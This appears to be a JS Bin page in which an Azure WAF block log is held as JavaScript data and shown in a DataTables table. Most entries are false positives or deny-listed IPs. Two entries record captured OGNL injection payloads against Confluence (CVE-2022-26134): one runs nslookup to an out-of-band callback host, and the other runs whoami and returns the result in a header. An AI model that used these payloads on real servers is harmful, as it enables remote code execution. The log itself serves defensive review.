"1", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "1", "bot_status": "1", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Netherlands", "countryCode": "NL", "region": "NH", "regionName": "North Holland", "city": "Amsterdam", "district": "", "zip": "1047", "lat": "52.3667", "lon": "4.9", "timezone": "Europe/Amsterdam", "offset": "7200", "currency": "EUR", "isp": "Microsoft Corporation", "org": "Microsoft Azure Cloud (westeurope)", "asname": "MICROSOFT-CORP-MSN-AS-BLOCK", "ASN": "8075", "reverse": "", "domain": "microsoft.com", "usageType": "Data Center/Web Hosting/Transit", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamName",\r\n "matchVariableValue": "amp;selectedIssue"\r\n }\r\n]", "QueryParamName", "amp;selectedIssue", "QueryParamName", "Equals", null, "predicateValue", "predicateValue", "0pVVNYwAAAAAdw6PPacH4SpaFxq3EBVL+UEFSMjAxMDMxMDE0MDI1ADM1ZjliOTQ2LTllMWEtNDkwNS1hZWU1LWNjZjE4NGEyOTZkNw==" ], [ "2022-10-19T15:00:05.3320972Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-MS-ThreatIntel-SQLI-99031002", "Microsoft_DefaultRuleSet-1.1", "MS-ThreatIntel-SQLI", "99031002", "SQL Comment Sequence Detected.", "https://api.example.com:443/pages/docreatepage.action", "94.60.196.168", { "id": "145", "created_date": "2022-10-20 11:37:13", "last_updated": "2022-10-20 14:37:13", "ipAddress": "94.60.196.168", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "0", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Portugal", "countryCode": "PT", "region": "13", "regionName": "Porto", "city": "Porto", "district": "", "zip": "4000-000", "lat": "41.1691", "lon": "-8.6793", "timezone": "Europe/Lisbon", "offset": "3600", "currency": "EUR", "isp": "Vodafone Portugal", "org": "Vodafone Telecel, Comunicacoes Pessoais, SA", "asname": "VODAFONE-PT", "ASN": "12353", "reverse": "168.196.60.94.rev.vodafone.pt", "domain": "vodafone.pt", "usageType": "", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "PostParamValue:parentPageString",\r\n "matchVariableValue": "UWCL Finals - 21/22 -- 20/12/2021"\r\n }\r\n]", "PostParamValue:parentPageString", "UWCL Finals - 21/22 -- 20/12/2021", "PostParamValue", "Equals", null, "parentPageString", "parentPageString", "09RBQYwAAAACoPBvUpx4SS541IptMRYbtQlJVMzBFREdFMDQxMABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-19T13:17:29.734758Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151", "Microsoft_DefaultRuleSet-1.1", "PROTOCOL-ATTACK", "921151", "HTTP Header Injection Attack via payload (CR/LF detected)", "https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3F%22&start=0&limit=100&_=1666184780361", "46.140.144.11", { "id": "25", "created_date": "2022-08-18 14:43:51", "last_updated": "2022-10-21 12:35:21", "ipAddress": "46.140.144.11", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "1", "bot_status": "1", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Switzerland", "countryCode": "CH", "region": "ZH", "regionName": "Zurich", "city": "Opfikon", "district": "", "zip": "8152", "lat": "47.4217", "lon": "8.55569", "timezone": "Europe/Zurich", "offset": "7200", "currency": "CHF", "isp": "UPC Schweiz GmbH", "org": "Sunrise UPC GmbH", "asname": "LibertyGlobal", "ASN": "6830", "reverse": "46-140-144-11.static.cablecom.ch", "domain": "hispeed.ch", "usageType": "", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?\\""\r\n }\r\n]", "QueryParamValue:cql", "user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?"", "QueryParamValue", "Equals", null, "cql", "cql", "06fhPYwAAAADf9xmFU2iCSb9Qxiyks2JbWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz" ], [ "2022-10-19T13:17:30.2529096Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151", "Microsoft_DefaultRuleSet-1.1", "PROTOCOL-ATTACK", "921151", "HTTP Header Injection Attack via payload (CR/LF detected)", "https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3Fk%22&start=0&limit=100&_=1666184780362", "46.140.144.11", { "id": "25", "created_date": "2022-08-18 14:43:51", "last_updated": "2022-10-21 12:35:21", "ipAddress": "46.140.144.11", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "1", "bot_status": "1", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Switzerland", "countryCode": "CH", "region": "ZH", "regionName": "Zurich", "city": "Opfikon", "district": "", "zip": "8152", "lat": "47.4217", "lon": "8.55569", "timezone": "Europe/Zurich", "offset": "7200", "currency": "CHF", "isp": "UPC Schweiz GmbH", "org": "Sunrise UPC GmbH", "asname": "LibertyGlobal", "ASN": "6830", "reverse": "46-140-144-11.static.cablecom.ch", "domain": "hispeed.ch", "usageType": "", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?k\\""\r\n }\r\n]", "QueryParamValue:cql", "user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?k"", "QueryParamValue", "Equals", null, "cql", "cql", "06vhPYwAAAADPsK4zzms8S4Aph7io0JqkWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz" ], [ "2022-10-14T13:59:21.6189951Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "0OWtJYwAAAABePH3TR7EXTYBbFT92CzFOU0VMMjFFREdFMDIwOABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-14T13:59:21.60786Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "0OWtJYwAAAABs0zbbTE0ZTo6drCSdhZG2U0VMMjFFREdFMDIxMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-14T14:00:04.2776607Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "0ZGtJYwAAAAAmeiJy5utDQKkghIWyxxthU0VMMjFFREdFMDIwNgBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-15T13:12:54.3205549Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-RCE-932130", "Microsoft_DefaultRuleSet-1.1", "RCE", "932130", "Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "104.251.238.50", { "id": "139", "created_date": "2022-10-20 11:36:49", "last_updated": "2022-10-20 14:36:49", "ipAddress": "104.251.238.50", "Malicious Score": "23", "is_crawler": "0", "mobile": "0", "hosting": "1", "proxy": "1", "vpn": "1", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "North America", "continentCode": "NA", "country": "United States", "countryCode": "US", "region": "CA", "regionName": "California", "city": "Los Angeles", "district": "", "zip": "90009", "lat": "34.0522", "lon": "-118.244", "timezone": "America/Los_Angeles", "offset": "-25200", "currency": "USD", "isp": "Zenlayer Inc", "org": "Klayer LLC", "asname": "ZEN-ECN", "ASN": "21859", "reverse": "104.251.238.50.static.klayer.com", "domain": "klayer.com", "usageType": "Data Center/Web Hosting/Transit", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${@java.lang.Runtime@getRuntime().try(\\"nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me\\")}/"\r\n }\r\n]", "DecodedPath", "${@java.lang.Runtime@getRuntime().try("nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me")}/", "DecodedPath", "Equals", "java.lang.Runtime", "Very likely malicious", null, "01rFKYwAAAADqUAxzKjYtQojWLsyE+yp9TEFYMzExMDAwMTA4MDQ3AGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw==" ], [ "2022-10-15T13:12:54.2857897Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-RCE-932130", "Microsoft_DefaultRuleSet-1.1", "RCE", "932130", "Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "104.251.238.50", { "id": "139", "created_date": "2022-10-20 11:36:49", "last_updated": "2022-10-20 14:36:49", "ipAddress": "104.251.238.50", "Malicious Score": "23", "is_crawler": "0", "mobile": "0", "hosting": "1", "proxy": "1", "vpn": "1", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "North America", "continentCode": "NA", "country": "United States", "countryCode": "US", "region": "CA", "regionName": "California", "city": "Los Angeles", "district": "", "zip": "90009", "lat": "34.0522", "lon": "-118.244", "timezone": "America/Los_Angeles", "offset": "-25200", "currency": "USD", "isp": "Zenlayer Inc", "org": "Klayer LLC", "asname": "ZEN-ECN", "ASN": "21859", "reverse": "104.251.238.50.static.klayer.com", "domain": "klayer.com", "usageType": "Data Center/Web Hosting/Transit", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try(\\"whoami\\").getInputStream(),\\"utf-8\\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\\"X-Cmd-Response\\",#a))}/"\r\n }\r\n]", "DecodedPath", "${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/", "DecodedPath", "Equals", "java.lang.Runtime", "Very likely malicious", null, "01rFKYwAAAAAyThJuCwwQS6b3tJi2uoPMTEFYMzExMDAwMTA4MDIzAGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw==" ], [ "2022-10-14T14:36:00.1574471Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "00HNJYwAAAAC4I8s8BM+WQJT5PY88psw2U0VMMjFFREdFMDExNQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-14T14:36:00.1527312Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "00HNJYwAAAABzhQVKlYE7Q4SM9bt5uFhHU0VMMjFFREdFMDExMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ]];$(document).ready( function () { var oTable = $('#azure-waf-block-table').DataTable({ data: data, paging: false,// pagingType: 'full_numbers', scrollY: 600, columns: [ { title: 'TimeGenerated', }, { title: 'policy_s' }, { title: 'ResourceGroup' }, { title: 'SubscriptionId' }, { title: 'Rule' }, { title: 'RuleSet' }, { title: 'RuleGroup' }, { title: 'RuleId' }, { title: 'details_matches_s' }, { title: 'details_msg_s', searchable: false, orderable: false, }, { title: 'requestUri_s' }, { title: 'ClientIP' }, { title: 'Client_IP_Reputation' }, { title: 'matchVariableName' }, { title: 'matchVariableNameFiltered' }, { title: 'matchVariableValue' }, { title: 'selectorMatchOperator' }, { title: 'Matched_Malicious_profile' }, { title: 'Whitelist_suggestion' }, { title: 'Whitelist' }, { title: 'trackingReference_s' }, ],// initComplete: function () {// this.api()// .columns()// .every(function () {// var column = this;// var select = $('<select class="bg-white dark:bg-slate-800 text-black dark:text-white border border-black dark:border-white"><option value=""></option></select>')// .appendTo($(column.header()))// .on('change', function () {// var val = $.fn.dataTable.util.escapeRegex($(this).val());// column.search(val ? '^' + val + '$' : '', true, false).draw();// });// column// .data()// .unique()// .sort()// // j is the index o tf the data, d is the actual data// .each(function (d, j) {// select.append('<option value="' + d + '">' + d + '</option>');// //console.log('j is: ' + d);// });// });// } });} );
You can jump to the latest bin by adding /latest to your URL
| Shortcut | Action |
|---|---|
| ctrl + [num] | Toggle nth panel |
| ctrl + 0 | Close focused panel |
| ctrl + enter | Re-render output. If console visible: run JS in console |
| Ctrl + l | Clear the console |
| ctrl + / | Toggle comment on selected lines |
| ctrl + [ | Indents selected lines |
| ctrl + ] | Unindents selected lines |
| tab | Code complete & Emmet expand |
| ctrl + s | Save & lock current Bin from further changes |
| ctrl + shift + s | Clone Bin |
| ctrl + y | Archive Bin |
Complete list of JS Bin shortcuts | |
| URL | Action |
|---|---|
| / | Show the full rendered output. This content will update in real time as it's updated from the /edit url. |
| /edit | Edit the current bin |
| /watch | Follow a Code Casting session |
| /embed | Create an embeddable version of the bin |
| /latest | Load the very latest bin (/latest goes in place of the revision) |
| /[username]/last | View the last edited bin for this user |
| /[username]/last/edit | Edit the last edited bin for this user |
| /[username]/last/watch | Follow the Code Casting session for the latest bin for this user |
| /quiet | Remove analytics and edit button from rendered output |
| .js | Load only the JavaScript for a bin |
| .css | Load only the CSS for a bin |
Except for username prefixed urls, the url may start with http://jsbin.com/abc and the url fragments can be added to the url to view it differently. | |